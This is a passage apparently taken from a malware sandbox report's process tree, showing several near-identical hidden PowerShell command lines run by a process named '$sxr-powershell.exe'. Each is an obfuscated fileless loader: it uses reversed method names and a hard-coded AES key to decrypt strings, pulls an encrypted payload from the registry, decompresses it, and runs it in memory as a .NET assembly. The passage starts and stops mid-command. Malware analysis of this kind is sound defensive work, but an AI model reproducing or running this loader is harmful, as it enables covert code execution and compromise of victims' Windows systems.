'')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:7540
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8708).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:3744
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3744).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:4048
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3744).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:8164
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3744).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, 